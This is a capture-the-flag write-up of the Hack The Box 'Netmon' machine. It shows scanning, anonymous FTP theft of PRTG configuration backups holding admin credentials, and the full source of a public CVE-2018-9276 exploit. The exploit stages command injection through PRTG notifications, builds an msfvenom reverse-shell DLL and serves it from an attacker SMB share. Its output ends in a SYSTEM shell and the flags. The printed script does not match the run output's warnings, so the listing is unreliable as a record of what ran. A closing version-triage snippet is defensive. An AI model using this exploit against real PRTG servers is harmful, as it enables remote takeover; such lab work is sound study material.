Netmon
Windows box on HTB.

Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.190.214
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-19 21:58 +03
Nmap scan report for 10.129.190.214
Host is up, received echo-reply ttl 127 (0.28s latency).
Scanned at 2025-09-19 21:58:13 +03 for 228s
Not shown: 65403 closed tcp ports (reset), 119 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
|_http-server-header: PRTG/18.1.37.13946
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
<snipped>
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

HTTP (80):

FTP (21):
Since we have anonymous FTP access, we look for any config or database files that could contain usernames and encrypted passwords.
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ ftp anonymous@10.129.190.214
Connected to 10.129.190.214.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50027|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50028|)
125 Data connection already open; Transfer starting.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50031|)
125 Data connection already open; Transfer starting.
09-19-25 03:07PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50033|)
125 Data connection already open; Transfer starting.
09-19-25 03:07PM <DIR> Configuration Auto-Backups
09-19-25 03:07PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
09-19-25 03:07PM <DIR> Logs (Web Server)
09-19-25 03:07PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
09-19-25 03:07PM 1641526 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get "PRTG Configuration.dat"
local: PRTG Configuration.dat remote: PRTG Configuration.dat
229 Entering Extended Passive Mode (|||50037|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 1161 KiB 329.84 KiB/s 00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:03 (319.10 KiB/s)
ftp> get "PRTG Configuration.dat.old"
local: PRTG Configuration.dat.old remote: PRTG Configuration.dat.old
229 Entering Extended Passive Mode (|||50042|)
550 The system cannot find the file specified.
ftp> get "PRTG Configuration.old"
local: PRTG Configuration.old remote: PRTG Configuration.old
229 Entering Extended Passive Mode (|||50043|)
150 Opening BINARY mode data connection.
100% |*******************************************************************************************************************************| 1161 KiB 314.70 KiB/s 00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:03 (305.12 KiB/s)
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50046|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 1126 KiB 277.77 KiB/s 00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:04 (269.27 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ cat PRTG\ Configuration.old.bak | grep -i prtgadmin -A 2 -B 2
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
--
</lastlogin>
<login>
prtgadmin
</login>
<name>

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ cat PRTG\ Configuration.old.bak | grep -i password -A 5 -B 5
0
</dbauth>
<dbcredentials>
0
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
60
</dbtimeout>
<depdelay>
0
<snipped>
Exploitation:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ searchsploit PRTG Network Monitor 18
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ git clone https://github.com/A1vinSmith/CVE-2018-9276.git
Cloning into 'CVE-2018-9276'...
remote: Enumerating objects: 61, done.
remote: Counting objects: 100% (61/61), done.
remote: Compressing objects: 100% (61/61), done.
remote: Total 61 (delta 19), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (61/61), 20.57 KiB | 1.29 MiB/s, done.
Resolving deltas: 100% (19/19), done.

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass

#!/usr/bin/python3
#####################################################################################
#
# Title: PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
# Reference: CVE-2018-9276
# https://nvd.nist.gov/vuln/detail/CVE-2018-9276
# Author: Alvin Smith
# Date: 29/07/2021
# Description: Re-write of exploit released by wildkindcc (https://github.com/wildkindcc/CVE-2018-9276)
# Python3 support
#
#####################################################################################
import colorama
import argparse
import http.client, urllib.request, urllib.parse, urllib.error
import traceback
import ssl
import random
import string
import json
import sys
import time
import os
from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
import threading
import logging
import socket
#####################################################################################
# Adds colourised notifications to text
# Colorama is not necessary for ANSI compliant terminals; however, it makes the colours work on Windows.
colorama.init()
error = '\033[31m[!] \033[0m'  # [!] Red
fail = '\033[31m[-] \033[0m'  # [-] Red
success = '\033[32m[+] \033[0m'  # [+] Green
event = '\033[34m[*] \033[0m'  # [*] Blue
debug = '\033[35m[%] \033[0m'  # [%] Magenta
notification = '[-] '  # [-]
#####################################################################################
# argparse
# https://docs.python.org/3.3/library/argparse.html#module-argparse
def get_args():
    # This function parses and returns the arguments passed in
    # Help (-h --help) is automagically defined.
    # Assign description to the help doc
    parser = argparse.ArgumentParser(
        description='CVE-2018-9276')
    # Add arguments
    parser.add_argument(
        '-i', '--host', type=str, help='IP address / Hostname of vulnerable PRTG server', required=True)
    parser.add_argument(
        '-p', '--port', type=str, help='Port number', required=True)
    parser.add_argument(
        '--lhost', type=str, help='LHOST for MSFVENOM', required=True)
    parser.add_argument(
        '--lport', type=str, help='LPORT for MSFVENOM', required=True)
    parser.add_argument(
        '--user', type=str, help='Administrator Username', required=False, default="prtgadmin")
    parser.add_argument(
        '--password', type=str, help='Administrator Password', required=False, default="prtgadmin")
    parser.add_argument(
        '--https', action='store_true', help='Negotiate SSL connection to the server (Requires socket to be compiled with SSL support)', required=False, default=None)
    # Array for all arguments passed to script
    args = parser.parse_args()
    # Assign args to variables
    host = args.host
    port = args.port
    lhost = args.lhost
    lport = args.lport
    user = args.user
    password = args.password
    https = args.https
    # Return all variable values
    return host, port, lhost, lport, user, password, https
#####################################################################################
host, port, lhost, lport, user, password, https = get_args()
url = "%s:%s" % (host, port)
def checkVersion():
    # Check for SSL
    if https:
        conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(url)
    conn.request("GET", "/")
    response = conn.getresponse()
    version = response.getheader('Server')
    conn.close()
    versionSplit = []
    vulnerable = True
    # The Server header looks like "PRTG/18.1.37.13946"; keep the first three components
    for var in version.split("/")[1].split(".")[:3]:
        versionSplit.append(var)
    if not int(versionSplit[0]) <= 18:
        print(versionSplit[0])
        vulnerable = False
    if not int(versionSplit[1]) <= 2:
        print(versionSplit[1])
        vulnerable = False
    if not int(versionSplit[2]) < 39:
        print(versionSplit[2])
        vulnerable = False
    if not vulnerable:
        raise ValueError('Server returned version [{}]'.format(version), "Versions < 18.2.39 are vulnerable to CVE-2018-9276")
    else:
        print(success + "[{}] is Vulnerable!".format(version))
    return 0
def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))
# Connects to the PRTG server instance and retrieves a valid session cookie.
def get_session():
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    payload = "loginurl=%2Fmyaccount.htm%3Ftabid%3D2&username={}&password={}".format(user, password)
    # Check for SSL
    if https:
        conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(url)
    conn.request("POST", "/public/checklogin.htm", payload, headers)
    response = conn.getresponse()
    header = response.getheader('set-cookie')
    conn.close()
    if not header:
        raise ValueError('Session not obtained. Check your username/password and try again!')
    else:
        print(success + "Session obtained for [{}:{}]".format(user, password))
    session = header.split(";")[0]
    return session
def createFile(fileLocation):
    # Prepare the environment by creating an output file required for injection
    session = get_session()
    name = randomString()
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Cookie': str(session)
    }
    payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=\"{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.parse.quote_plus(fileLocation))
    # Check for SSL
    if https:
        conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(url)
    conn.request("POST", "/editsettings", payload, headers)
    response = conn.getresponse()
    objid = json.loads(response.read())['objid']
    conn.close()
    print(success + "File staged at [{}] successfully with objid of [{}]".format(fileLocation, objid))
    return objid
def prepareCommand(fileLocation, command):
    session = get_session()
    # File: log output which we require for injection
    # Session: A valid session ID returned from get_session
    name = randomString()
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Cookie': str(session)
    }
    payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=\"{};{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.parse.quote_plus(fileLocation), urllib.parse.quote_plus(command))
    # Check for SSL
    if https:
        conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(url)
    conn.request("POST", "/editsettings", payload, headers)
    #conn.debuglevel = 1
    response = conn.getresponse()
    #print response.status, response.reason
    objid = json.loads(response.read())['objid']
    conn.close()
    print(success + "Command staged at [{}] successfully with objid of [{}]".format(fileLocation, objid))
    return objid
def notify(objid):
    session = get_session()
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Cookie': str(session)
    }
    payload = "id={}".format(objid)
    # Check for SSL
    if https:
        conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
    else:
        conn = http.client.HTTPConnection(url)
    conn.request("POST", "/api/notificationtest.htm", payload, headers)
    response = conn.getresponse()
    data = response.read()
    data = data.decode('utf-8')  # Decode the bytes object to string as 2to3 didn't do it
    conn.close()
    if 'EXE notification is queued up' not in data:
        raise ValueError('Notify did not return the correct response.', data)
    else:
        print(success + "Notification with objid [{}] staged for execution".format(objid))
    return 0
def initialise(fileLocation):
    objid = createFile(fileLocation)
    time.sleep(5)
    notify(objid)
def executeCommand(fileLocation, command):
    objid = prepareCommand(fileLocation, command)
    time.sleep(5)
    notify(objid)
def generatePayload(output, lhost, lport):
    print(event + "Generate msfvenom payload with [LHOST={} LPORT={} OUTPUT={}]".format(lhost, lport, output))
    os.system("msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=" + lport + " -f dll > " + output)
def hostPayload(lhost, outputDir, shareName):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare(shareName, outputDir)
    # If the host you're talking to doesn't support SMBv1 this can be uncommented to enable it. This is an experimental impacket feature.
    # server.setSMB2Support(True)
    server.setSMBChallenge('')
    # Both backslashes are escaped; a bare "\{" raises a SyntaxWarning on recent Pythons
    print(event + "Hosting payload at [\\\\{}\\{}]".format(lhost, shareName))
    server.start()
    # I commented out to avoid log error "Unknown level for query path info"
    # https://github.com/SecureAuthCorp/impacket/blob/master/impacket/smbserver.py
    '''
    time.sleep(5)
    server.stop()
    '''
#####################################################################################
logging.basicConfig(level=logging.DEBUG, format=event + '%(message)s',)
# Simple error handling because
try:
    # Default writable file location
    fileLocation = 'C:\\Users\\Public\\tester.txt'
    checkVersion()
    print("")
    print(event + "Exploiting [%s:%s] as [%s/%s]" % (host, port, user, password))
    shellName = randomString()
    shareName = randomString().upper()
    outputDir = "/tmp"
    payload = "{}/{}.dll".format(outputDir, shellName)
    shellLocation = "\\\\{}\\{}\\{}.dll".format(lhost, shareName, shellName)
    initialise(fileLocation)
    # Generate our reverse shell payload
    generatePayload(payload, lhost, lport)
    # Setup the threading to run an impacket server in the background
    impacket = threading.Timer(0, hostPayload, args=(lhost, outputDir, shareName,))
    impacket.name = 'Impacket'  # setName()/setDaemon() are deprecated; set the attributes instead
    impacket.daemon = True
    impacket.start()
    # Little sleep just to make sure everything is dandy
    time.sleep(2)
    command = "rundll32.exe " + shellLocation + ",0"
    executeCommand(fileLocation, command)
    # Close the SMB server when no longer required
    print(event + "Attempting to kill the impacket thread")
    print(notification + "Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!")
    print(notification + "ps aux | grep <script name> and kill -9 <pid> if it is still running :)")
    print(notification + "The connection will eventually time out.")
    impacket.cancel()
    print("")
    print(success + "Listening on [{}:{} for the reverse shell!]".format(lhost, lport))
    os.system("nc -nvlp " + lport)
except ValueError as err:
    # An exception is not iterable; its message parts live in err.args
    for errors in err.args:
        print(error + str(errors))
    traceback.print_exc()
except Exception:
    print(error + "An unhandled exception has occurred!")
    traceback.print_exc()

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/CVE-2018-9276]
└─$ python3 exploit.py -i 10.129.190.214 -p 80 --lhost 10.10.16.43 --lport 443 --user prtgadmin --password 'PrTg@dmin2019'
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:259: SyntaxWarning: invalid escape sequence '\{'
print(event + "Hosting payload at [\\\\{}\{}]".format(lhost, shareName))
[+] [PRTG/18.1.37.13946] is Vulnerable!
[*] Exploiting [10.129.190.214:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.16.43 LPORT=443 OUTPUT=/tmp/xtkjnbyy.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
impacket.setName('Impacket')
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.16.43\SCOWTFJM]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.
[+] Listening on [10.10.16.43:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.129.190.214,50328)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.16.43] from (UNKNOWN) [10.129.190.214] 50331
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
[*] Disconnecting Share(1:IPC$)
whoami
nt authority\system
C:\Windows\system32>hostname
netmon
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::385f:3c24:ed5a:98c5
Link-local IPv6 Address . . . . . : fe80::385f:3c24:ed5a:98c5%3
IPv4 Address. . . . . . . . . . . : 10.129.190.214
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
b8fee113ab436d6473a94324ae781b99
C:\Windows\system32>type C:\Users\Public\Desktop\user.txt
dd231602d6d27ed42fe45d4421ce79ed
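The exploit's checkVersion() decides from the Server header ("PRTG/18.1.37.13946" here) whether the target predates the 18.2.39 fix, but it tests each version component on its own, so a build such as 17.4.40 would wrongly be reported as patched. The following is an added example (not from the write-up or the exploit repository) of the same gate done as a tuple comparison, the way an asset inventory would triage PRTG hosts; the headers other than the Netmon one are constructed and `parse_prtg_version`/`is_unpatched` are hypothetical names.

```python
"""Triage PRTG Server headers against the CVE-2018-9276 fix release (added example)."""
import re

FIXED_IN = (18, 2, 39)  # PRTG 18.2.39 is the first release without CVE-2018-9276
SERVER_HEADER = re.compile(r"^PRTG/(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_prtg_version(server_header):
    """'PRTG/18.1.37.13946' -> (18, 1, 37, 13946); None if this is not a PRTG header."""
    m = SERVER_HEADER.match(server_header.strip())
    if not m:
        return None
    return tuple(int(g) for g in m.groups() if g is not None)


def is_unpatched(server_header):
    """True when the header advertises a build older than 18.2.39 (tuple comparison)."""
    v = parse_prtg_version(server_header)
    if v is None:
        raise ValueError("not a PRTG Server header: %r" % server_header)
    return v[:3] < FIXED_IN


def componentwise_check(server_header):
    """The per-component test the exploit uses (major <= 18, minor <= 2, build < 39)."""
    major, minor, build = parse_prtg_version(server_header)[:3]
    return major <= 18 and minor <= 2 and build < 39


def triage(headers):
    """Map each header to (tuple verdict, componentwise verdict) to expose disagreements."""
    return {h: (is_unpatched(h), componentwise_check(h)) for h in headers}


if __name__ == "__main__":
    # Only the first header is from the nmap output above; the rest are constructed.
    for h, (correct, naive) in triage([
        "PRTG/18.1.37.13946",  # Netmon: unpatched under both checks
        "PRTG/17.4.40.1000",   # older than the fix, yet the componentwise check says patched
        "PRTG/18.2.39.1661",   # first fixed build: not vulnerable
        "PRTG/19.1.1.1",       # newer major: not vulnerable
    ]).items():
        print(f"{h:22s} unpatched={correct!s:5s} componentwise={naive}")
```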